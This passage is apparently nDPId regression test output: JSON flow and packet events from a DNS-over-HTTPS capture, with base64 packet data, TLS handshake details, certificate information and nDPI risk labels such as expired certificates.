-00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 